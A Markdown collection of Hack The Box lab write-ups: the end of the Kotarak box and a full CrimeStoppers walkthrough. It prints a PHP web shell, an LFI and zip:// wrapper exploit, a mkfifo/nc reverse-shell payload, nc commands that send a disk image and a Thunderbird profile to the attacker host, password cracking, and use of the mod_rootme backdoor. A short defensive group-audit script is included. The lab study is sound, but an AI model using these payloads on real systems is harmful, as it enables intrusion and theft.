atanas@kotarak-dmz:~$ which dd
/bin/dd
atanas@kotarak-dmz:~$ which nc
/bin/nc
atanas@kotarak-dmz:~$ which gunzip
/bin/gunzip
Looks like it, so we use dd to read out the contents of dm-0, pipe it into gzip to compress away the unused zeros, and pipe that into netcat to send it back to our machine:
atanas@kotarak-dmz:~$ dd if=/dev/dm-0 | gzip -1 - | nc 10.10.14.6 9095
[ 10.10.14.6/23 ] [ /dev/pts/19 ] [~/_HTB/Kotarak]
→ nc -lvnp 9095 > disk.img.gz
listening on [any] 9095 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.55] 56702
Using gzip compresses the stream for us, so we avoid downloading gigabytes of zeros.
![](prg/7/19.png)
Wait for it to finish (the compressed file is 2.2G), then decompress it locally (7.5G):
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→gunzip disk.img.gz
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ ls -lash disk.img
7.1G -rw-r--r-- 1 nothing nothing 7.0G Dec 22 16:44 disk.img
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ mkdir /mnt/kotarak
mkdir: cannot create directory /mnt/kotarak: Permission denied
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo !!
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo mkdir /mnt/kotarak
[sudo] password for nothing:
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ sudo mount disk.img /mnt/kotarak
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~/_HTB/Kotarak]
→ cd /mnt/kotarak
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
→ ls -l
total 116
drwxr-xr-x 3 root root 4096 Jul 21 2017 backups
drwxr-xr-x 2 root root 4096 Jul 10 2017 bin
drwxr-xr-x 2 root root 4096 Jul 9 2017 boot
drwxr-xr-x 4 root root 4096 Jul 21 2017 dev
drwxr-xr-x 105 root root 4096 Jan 18 2018 etc
drwxr-xr-x 4 root root 4096 Jul 21 2017 home
drwxr-xr-x 24 root root 4096 Jul 21 2017 lib
drwxr-xr-x 2 root root 4096 Jul 21 2017 lib32
drwxr-xr-x 2 root root 4096 Jul 21 2017 lib64
drwxr-xr-x 2 root root 4096 Jul 21 2017 libx32
drwx------ 2 root root 16384 Jul 9 2017 lost+found
drwxr-xr-x 4 root root 4096 Jul 21 2017 media
drwxr-xr-x 2 root root 4096 Jul 19 2016 mnt
drwxr-xr-x 4 root root 4096 Jul 21 2017 opt
drwxr-xr-x 2 root root 4096 Jul 21 2017 proc
drwxrwxrwx 6 root root 4096 Sep 19 2017 root
drwxr-xr-x 2 root root 4096 Jul 9 2017 run
drwxr-xr-x 2 root root 12288 Jul 21 2017 sbin
drwxr-xr-x 2 root root 4096 Jul 21 2017 snap
drwxr-xr-x 2 root root 4096 Jul 21 2017 srv
drwxr-xr-x 2 root root 4096 Jul 21 2017 sys
drwxrwxrwt 10 root root 4096 Dec 22 16:39 tmp
drwxr-xr-x 13 root root 4096 Jul 21 2017 usr
drwxr-xr-x 15 root root 4096 Jul 21 2017 var
lrwxrwxrwx 1 root root 29 Aug 29 2017 vmlinuz -> boot/vmlinuz-4.4.0-87-generic
lrwxrwxrwx 1 root root 29 Jul 10 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-83-generic
And from here just go to the root directory and print out the root flag:
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [/mnt/kotarak]
→ sudo -i
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [~]
→ cd /mnt/kotarak/var/lib/lxc/kotarak-int/rootfs/root
[ 10.10.14.6/23 ] [ /dev/pts/20 ] [kotarak-int/rootfs/root]
→ cat root.txt
95XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[ 10.10.14.6/23 ] [ /dev/pts/18 ] [~/_HTB/Kotarak]
→ sudo umount /mnt/kotarak
And there you have it!
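As an added defender-side check (my example, not part of the writeup), the following Python audits /etc/passwd and /etc/group for regular accounts that sit in groups such as disk (raw block-device access, which is exactly what made dd on /dev/dm-0 possible above) or adm. The passwd and group contents are constructed samples, and the list of high-risk groups is an assumption to adapt to local policy.

```python
from typing import Dict, List, Set, Tuple

# Groups whose membership is effectively a privilege boundary. Constructed
# list (an assumption, not from any standard); extend it to match local policy.
HIGH_RISK_GROUPS = {
    "disk": "raw read/write on block devices (dd if=/dev/dm-0), bypasses file permissions",
    "adm": "reads system and service logs, which often leak credentials",
    "shadow": "reads /etc/shadow",
    "sudo": "runs commands as root through sudo",
    "docker": "can mount the host filesystem into a container",
    "lxd": "can start a privileged container with the host disk attached",
}

# Constructed sample files, modelled on the id output of this box:
# atanas is in adm and disk as a supplementary member, svc has disk as
# its primary group (gid 6) without appearing in the member list.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
atanas:x:1000:1000:atanas:/home/atanas:/bin/bash
tomcat:x:1001:1001::/home/tomcat:/bin/bash
svc:x:1002:6::/var/lib/svc:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,atanas
disk:x:6:atanas
cdrom:x:24:atanas
lxd:x:110:
atanas:x:1000:
tomcat:x:1001:
"""


def parse_passwd(text: str) -> Dict[str, Tuple[int, int]]:
    """Map user name -> (uid, primary gid) from /etc/passwd contents."""
    users: Dict[str, Tuple[int, int]] = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 4 or line.startswith("#"):
            continue
        users[parts[0]] = (int(parts[2]), int(parts[3]))
    return users


def parse_group(text: str) -> Dict[str, Tuple[int, Set[str]]]:
    """Map group name -> (gid, supplementary members) from /etc/group contents."""
    groups: Dict[str, Tuple[int, Set[str]]] = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 4 or line.startswith("#"):
            continue
        members = {m for m in parts[3].split(",") if m}
        groups[parts[0]] = (int(parts[2]), members)
    return groups


def audit(passwd_text: str, group_text: str, min_uid: int = 1000) -> Dict[str, List[str]]:
    """Return {user: [risky groups]} for every regular account (uid >= min_uid).

    Both supplementary membership and the primary group from passwd are
    counted, since `id` reports both and a primary gid of 6 grants disk
    access without the user ever being listed in /etc/group.
    """
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    findings: Dict[str, List[str]] = {}
    for user, (uid, gid) in users.items():
        if uid < min_uid:
            continue
        member_of = {name for name, (_, members) in groups.items() if user in members}
        primary = gid_to_name.get(gid)
        if primary is not None:
            member_of.add(primary)
        risky = sorted(g for g in member_of if g in HIGH_RISK_GROUPS)
        if risky:
            findings[user] = risky
    return findings


if __name__ == "__main__":
    for user, risky in sorted(audit(SAMPLE_PASSWD, SAMPLE_GROUP).items()):
        for g in risky:
            print(f"{user}: {g} -> {HIGH_RISK_GROUPS[g]}")
```

On a live box, feed it the contents of /etc/passwd and /etc/group instead of the samples; any hit on disk is the same exposure this writeup turned into a root flag.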
## **Conclusion**
Here we can see the progress graph :
![](img/6_graph.png)
611
Hard/8.md Normal file
@ -0,0 +1,611 @@
# CrimeStoppers Writeup
![](img/8.png)
## Introduction :
CrimeStoppers is a hard linux box released back in January 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.80 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Discovered open port 80/tcp on 10.10.10.80
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ sudo nmap -sCV -p80 10.10.10.80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 10:21 GMT
Nmap scan report for 10.10.10.80
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Ubuntu))
|_http-server-header: Apache/2.4.25 (Ubuntu)
|_http-title: FBIs Most Wanted: FSociety
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/8/1.png)
we navigate to the upload page:
![](prg/8/2.png)
And here the fun starts. Let's see if this op parameter is vulnerable to LFI:
![](prg/8/3.png)
So it seems the developer tries to protect against LFI attacks. Let's see if we can read the source anyway with the well-known php://filter trick, which returns the included file base64-encoded instead of executing it:
[ 10.10.14.7/23 ] [ /dev/pts/8 ] [~]
→ curl http://10.10.10.80/\?op\=php://filter/convert.base64-encode/resource\=view 2>/dev/null | tail -n21 | head -n1
PD9waHAKaW5jbHVkZSAnY29tbW9uLnBocCc7CgppZihlbXB0eSgkX0dFVFsnc2VjcmV0bmFtZSddKSkgewogICAgaGVhZGVyKCdMb2NhdGlvbjogP29wPWhvbWUnKTsKICAgIGV4aXQoKTsKfQoKJHNlY3JldG5hbWUgPSAkX0dFVFsnc2VjcmV0bmFtZSddOwppZiAoJHNlY3JldG5hbWUgPT0gIndoaXRlcm9zZS50eHQiKSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuIGJhc2VuYW1lKCRzZWNyZXRuYW1lKSk7Cn0gZWxzZSB7CgkkdGlwID0gZmlsZV9nZXRfY29udGVudHMoJ3VwbG9hZHMvJyAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gJy8nIC4gYmFzZW5hbWUoJHNlY3JldG5hbWUpKTsKfQoKPz4KCjw/cGhwCmVjaG8gIllvdXIgVGlwOjxiciAvPiI7CmVjaG8gaHRtbGVudGl0aWVzKCR0aXApOwo/Pgo8L3NjcmlwdD4K </footer>
Then simply pipe it through base64 -d and you get the following results:
![](prg/8/4.png)
Not much in the view php page above, however on the upload php file we see something interesting:
![](prg/8/5.png)
if(isset($_POST['submit']) && isset($_POST['tip'])) {
// CSRF Token to help ensure this user came from our submission form.
if 1 == 1 { //(!empty($_POST['token'])) {
if (hash_equals($token, $_POST['token'])) {
$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
// Place tips in the folder of the client IP Address.
if (!is_dir('uploads/' . $client_ip)) {
mkdir('uploads/' . $client_ip, 0755, false);
}
$tip = $_POST['tip'];
$secretname = genFilename();
file_put_contents("uploads/". $client_ip . '/' . $secretname, $tip);
header("Location: ?op=view&secretname=$secretname");
} else {
print 'Hacker Detected.';
print $token;
die();
}
}
Here we see that the submitted tips are written to **/uploads/<client ip>/** , so we should be able to upload arbitrary data into a file. Moving on to the index php page we see something interesting:
![](prg/8/6.png)
There is a disabled parameter here named 'list' so let's browse to it and see what we get:
![](prg/8/7.png)
Which reveals a text file:
![](prg/8/8.png)
Which reveals the parameter "secretname", which most likely designates the filename itself, as seen above. So let's build a payload:
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ vim cmd.php
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ cat cmd.php
<?php echo system($_GET['cmd']); ?>
[ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/CrimeStoppers]
→ zip shell.zip cmd.php
adding: cmd.php (stored 0%)
Now we can use curl to upload to the site. We need the session cookie and the CSRF token, and afterwards we need to follow the redirection (302) Location header. For debugging purposes we pass everything through the Burp Suite proxy with **-x 127.0.0.1:8080** as follows:
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
→ curl -sD - http://10.10.10.80/\?op\=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
Set-Cookie: PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5; path=/
<input type="text" id="token" name="token" style="display: none" value="16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" style="width:355px;" />
Next we use the CSRF token and the session cookie to send the zip file containing our cmd.php payload (run it from bash, because there's something in the command zsh doesn't like):
[ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/HTB/Crimestoppers]
→ bash
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -X POST -sD - -F "tip=<shell.zip" -F "name=a" -F "token=16df27a6347c2285cc0dbf5c1525d0f0be26c44cdde404a2fd2c0e90a592ffd6" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=kgr3kb7nskn6e2gh6spmtfjfk5"
![](prg/8/28.png)
We forward the request and we get the location of our file:
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -sD - http://10.10.10.80/?op=upload -x 127.0.0.1:8080 | grep -e PHPSESSID -e 'name="token"'
Set-Cookie: PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5; path=/
<input type="text" id="token" name="token" style="display: none" value="74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" style="width:355px;" />
┌──(nothing㉿nowhere)-[~/HTB/Crimestoppers]
└─$ curl -X POST -sD - -F "tip= <shell.zip" -F "name=a" -F "token=74076b162a114837f912f9476baa778842aa1d1385702c88921495bd9d2ccd36" -F "submit=Send Tip!" -x 127.0.0.1:8080 http://10.10.10.80/\?op\=upload -H "Referer: http://10.10.10.80/?op=upload" -H "Cookie: admin=1; PHPSESSID=cqoq8gg8fqd3cqfl7mflbqfff5" | grep Location
Location: ?op=view&secretname=db0cf33401569e78efe46ec7df40e66a4d1f3252
Now that we have the location **?op=view&secretname=db0cf33401569e78efe46ec7df40e66a4d1f3252** we can get command execution through the **zip://** wrapper at **http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd=id** :
![](prg/8/29.png)
And we have code execution as www-data! Now let's send it over to burpsuite's repeater:
![](prg/8/30.png)
Now let's see if we can get to the user flag:
![](prg/8/31.png) ![](prg/8/32.png)
And we got the user flag from dom's directory!
## **Part 3 : Getting Root Access**
Before we proceed to privesc let's get a reverse bash shell:
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9001
listening on [any] 9001 ...
#RAW PAYLOAD
GET /?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f HTTP/1.1
#URL ENCODED (SELECT AND CTRL+U)
http://10.10.10.80/?op=zip://uploads/10.10.14.8/db0cf33401569e78efe46ec7df40e66a4d1f3252%23cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.11+9001+>/tmp/f
![](prg/8/33.png)
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 40832
/bin/sh: 0: can't access tty; job control turned off
$
And we get a reverse shell! Now as usual we spawn a fully interactive TTY:
/bin/sh: 0: can't access tty; job control turned off
$ which python python3 wget curl bash sh
/usr/bin/python3
/usr/bin/wget
/bin/bash
/bin/sh
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ ^Z
[1] + 429408 suspended nc -lvnp 9001
[ 10.10.14.8/23 ] [ /dev/pts/7 ] [~/HTB/Crimestoppers]
→ stty raw -echo ; fg
[1] + 429408 continued nc -lvnp 9001
export TERM=screen-256color
www-data@ubuntu:/var/www/html$ export SHELL=bash
www-data@ubuntu:/var/www/html$ stty rows 50 columns 200
www-data@ubuntu:/var/www/html$ reset
Now that's done we navigate to dom's home directory to find the .thunderbird hint:
www-data@ubuntu:/var/www/html$ cd /home/dom
www-data@ubuntu:/home/dom$ ls -lash
total 44K
4.0K drwxr-xr-x 5 dom dom 4.0K Dec 25 2017 .
4.0K drwxr-xr-x 3 root root 4.0K Dec 16 2017 ..
4.0K -rw------- 1 dom dom 52 Dec 16 2017 .Xauthority
4.0K -rw------- 1 dom dom 5 Dec 22 2017 .bash_history
4.0K -rw-r--r-- 1 dom dom 220 Dec 16 2017 .bash_logout
4.0K -rw-r--r-- 1 dom dom 3.7K Dec 16 2017 .bashrc
4.0K drwx------ 2 dom dom 4.0K Dec 16 2017 .cache
4.0K -rw-r--r-- 1 dom dom 675 Dec 16 2017 .profile
4.0K drwx------ 2 dom dom 4.0K Dec 25 2017 .ssh
0 -rw-r--r-- 1 dom dom 0 Dec 16 2017 .sudo_as_admin_successful
4.0K drw-r-xr-x 3 root root 4.0K Dec 16 2017 .thunderbird
4.0K -r--r--r-- 1 root root 33 Jul 9 09:07 user.txt
www-data@ubuntu:/home/dom$ which nc
/bin/nc
Let's zip it and transfer it to our box; netcat is already present on the target, so we use that:
[terminal 1]
www-data@ubuntu:/home/dom$ zip -r /tmp/thunder.zip .thunderbird/
www-data@ubuntu:/home/dom$ cd /tmp
www-data@ubuntu:/tmp$
www-data@ubuntu:/tmp$ ls -l
total 408
prw-r--r-- 1 www-data www-data 0 Jul 9 10:00 f
-rw-r--r-- 1 www-data www-data 414930 Jul 9 09:59 thunder.zip
www-data@ubuntu:/tmp$ md5sum thunder.zip
57666b729532e628aac22b2e7d84b21d thunder.zip
www-data@ubuntu:/tmp$ cat thunder.zip | nc 10.10.14.8 9999
[terminal 2]
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ nc -lvnp 9999 > thunder.zip
listening on [any] 9999 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.80] 49806
^C
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ md5sum thunder.zip
57666b729532e628aac22b2e7d84b21d thunder.zip
Both hashes match, therefore the file transfer was successful.
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ unzip thunder.zip
Archive: thunder.zip
creating: .thunderbird/
creating: .thunderbird/36jinndk.default/
inflating: .thunderbird/36jinndk.default/webappsstore.sqlite
inflating: .thunderbird/36jinndk.default/extensions.ini
extracting: .thunderbird/36jinndk.default/times.json
inflating: .thunderbird/36jinndk.default/blist.sqlite
extracting: .thunderbird/36jinndk.default/.parentlock
inflating: .thunderbird/36jinndk.default/xulstore.json
inflating: .thunderbird/36jinndk.default/formhistory.sqlite
inflating: .thunderbird/36jinndk.default/**key3.db**
Once it is unzipped, we run **mozilla2john** on the **key3.db** file and crack the result with **john** and rockyou.txt:
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db
key3.db:$mozilla$*3*20*1*811d3b70d608a8ad6faee44bf0568bd77ca8b2ca*11*0000000000000000000000*16*1810e3dcb634e700a4d959e35d38f282*20*11a9519177437ef38aa8bf1966d02f0d9f6a8c2f
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ sudo /usr/share/john/mozilla2john.py .thunderbird/36jinndk.default/key3.db > key3.db.john
[ 10.10.14.8/23 ] [ /dev/pts/31 ] [~/HTB/Crimestoppers]
→ john -w=/usr/share/wordlists/rockyou.txt key3.db.john --fork=4
Using default input encoding: UTF-8
Loaded 1 password hash (Mozilla, Mozilla key3.db [SHA1 3DES 32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
(key3.db)
4 1g 0:00:00:00 DONE (2021-07-09 19:30) 33.33g/s 42666p/s 42666c/s 42666C/s smitty..babygrl
2 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 237479p/s 237479c/s 237479C/s tania.abygurl69
1 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 234069p/s 234069c/s 234069C/s Jakekovac3.ie168
Waiting for 3 children to terminate
3 0g 0:00:00:15 DONE (2021-07-09 19:30) 0g/s 230903p/s 230903c/s 230903C/s 0125457423 .a6_123
Session completed
John reports the master password of our key3.db file as empty, so let's install Thunderbird and load the profile to check whether it really is empty:
[ 10.10.14.8/23 ] [ /dev/pts/32 ] [~/HTB/Crimestoppers]
→ sudo apt install thunderbird -y
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~]
→ cd ~/.thunderbird
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ ls
110d40o6.default 13u77s1u.default-default 'Crash Reports' installs.ini 'Pending Pings' profiles.ini
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ sudo cp -r ~/HTB/Crimestoppers/.thunderbird/36jinndk.default .
[sudo] password for nothing:
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ vim profiles.ini
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ cat profiles.ini
[Profile1]
Name=default
IsRelative=1
Path=36jinndk.default
Default=1
[InstallFDC34C9F024745EB]
Default=13u77s1u.default-default
Locked=1
[Profile0]
Name=default-default
IsRelative=1
Path=13u77s1u.default-default
[General]
StartWithLastProfile=1
Version=2
[ 10.10.14.8/23 ] [ /dev/pts/34 ] [~/.thunderbird]
→ thunderbird -ProfileManager
After taking a look at dom's emails, we can open the 'saved passwords' security setting to find her password **Gummer59** , so let's get a shell as dom:
www-data@ubuntu:/var/www/html$ su - dom
Password: Gummer59
dom@ubuntu:~$ id
uid=1000(dom) gid=1000(dom) groups=1000(dom),**4(adm)**,24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
One interesting thing to note here is that we are part of the **adm** group, so we may be able to read the machine's logs. With that noted, let's take a look at her draft emails:
dom@ubuntu:~$ cd .thunderbird/36jinndk.default/ImapMail/crimestoppers.htb/
dom@ubuntu:~/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb$ cat Drafts-1
From
FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
X-Identity-Key: id1
X-Account-Key: account1
To: elliot@ecorp.htb
From: dom
Subject: Potential Rootkit
Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
Date: Sat, 16 Dec 2017 12:53:18 -0800
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
attachmentreminder=0; deliveryformat=4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Thunderbird/52.5.0
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Elliot.
We got a suspicious email from the DarkArmy claiming there is a
Remote Code Execution bug on our Webserver.  I don't trust them
and ran rkhunter, it reported that there a rootkit installed
called: apache_modrootme backdoor.
According to my research, if this rootkit was on the server I
should be able to run "nc localhost 80" and then type get root to
get
nc localhost 80
get root
From - Sat Dec 16 12:53:19 2017
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
FCC: imap://dom%40crimestoppers.htb@crimestoppers.htb/Sent
X-Identity-Key: id1
X-Account-Key: account1
To: elliot@ecorp.htb
From: dom
Subject: Potential Rootkit
Message-ID: <1f42c857-08fd-1957-8a2d-fa9a4697ffa5@crimestoppers.htb>
Date: Sat, 16 Dec 2017 12:53:18 -0800
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; DSN=0; uuencode=0;
attachmentreminder=0; deliveryformat=4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Thunderbird/52.5.0
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Elliot.
We got a suspicious email from the DarkArmy claiming there is a
Remote Code Execution bug on our Webserver.  I don't trust them
and ran rkhunter, it reported that there a rootkit installed
called: apache_modrootme backdoor.
According to my research, if this rootkit was on the server I
should be able to run "nc localhost 80" and then type get root to
get
nc localhost 80
get root
Now we have a hint towards a certain rootkit/backdoor called **apache_modrootme** , so let's run linpeas.sh on the box and see whether it gets picked up:
[terminal 1]
[ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
[ 10.10.14.8/23 ] [ /dev/pts/14 ] [~/HTB/Crimestoppers]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.80 - - [10/Jul/2021 13:56:57] "GET /linpeas.sh HTTP/1.1" 200 -
[terminal 2]
dom@ubuntu:~$ wget http://10.10.14.8:9090/linpeas.sh -O /tmp/peas.sh
--2021-07-10 05:05:15-- http://10.10.14.8:9090/linpeas.sh
Connecting to 10.10.14.8:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh
/tmp/peas.sh 100%[=============================================================================================================>] 333.85K 117KB/s in 2.8s
2021-07-10 05:05:19 (117 KB/s) - /tmp/peas.sh saved [341863/341863]
dom@ubuntu:~$ chmod +x /tmp/peas.sh
dom@ubuntu:~$ /tmp/peas.sh
![](prg/8/35.png)
We don't get the modrootme apache string we were hoping for, but linpeas does confirm our earlier suspicion: we are able to read the apache2 logs, and chances are we will find passwords in there. So let's take a look:
![](prg/8/36.png)
dom@ubuntu:/var/log/apache2$ zcat access.log.* | grep -v 'OPTIONS\|HEAD\|POST\|GET' | grep ' 400 '
gzip: access.log.1: not in gzip format
::1 - - [25/Dec/2017:12:59:19 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:00:00 -0800] "FunSociety" 400 0 "-" "-"
127.0.0.1 - - [25/Dec/2017:13:11:04 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:22 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:32 -0800] "42PA" 400 0 "-" "-"
10.10.10.80 - - [25/Dec/2017:13:11:46 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:12 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:52 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:13:55 -0800] "FunSociety" 400 0 "-" "-"
::1 - - [25/Dec/2017:13:14:00 -0800] "FunSociety" 400 0 "-" "-"
10.10.14.3 - - [25/Dec/2017:13:14:53 -0800] "FunSociety" 400 0 "-" "-"
10.10.10.80 - - [22/Dec/2017:10:17:17 -0800] "sdf" 400 0 "-" "-"
10.10.10.80 - - [22/Dec/2017:10:17:34 -0800] "Get FunSociety" 400 301 "-" "-"
::1 - - [23/Dec/2017:14:39:17 -0800] "get root" 400 301 "-" "-"
::1 - - [23/Dec/2017:14:40:53 -0800] "get-root" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:41:02 -0800] "root" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:43:28 -0800] "HackTheBox" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:43:34 -0800] "darkarmy" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:46:50 -0800] "WhiteRose@DarkArmy.htb" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:48:09 -0800] "HackTheBox" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:48:30 -0800] "/var/www/html/uploads/whiterose.txt" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:51:37 -0800] "bash" 400 0 "-" "-"
::1 - - [23/Dec/2017:14:57:40 -0800] "rootme" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:04:41 -0800] "hACKtHEbOX" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:04:52 -0800] "DmogXdiNct" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:04 -0800] "ElnfYehObu" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:12 -0800] "FomeZfkLav" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:21 -0800] "dMOGxDInCT" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:33 -0800] "eLNFyEHoBU" 400 0 "-" "-"
::1 - - [23/Dec/2017:15:05:46 -0800] "fOMEzFKlAV" 400 0 "-" "-"
Looking at apache's access logs we see a bunch of requests that were made with the passphrases **FunSociety** and **get-root**. We put the pieces together by taking a look at the modrootme github repository [here](https://github.com/sajith/mod-rootme), which tells us we need to do the following:
nc localhost 80
get root
id
So let's try it:
[ 10.10.14.8/23 ] [ /dev/pts/15 ] [~/HTB/Crimestoppers]
→ nc 10.10.10.80 80
GET FunSociety
rootme-0.5 DarkArmy Edition Ready
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:/# cd ~
cd ~
root@ubuntu:/root# cat root.txt
cat root.txt
6fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get a root shell and get the root flag.
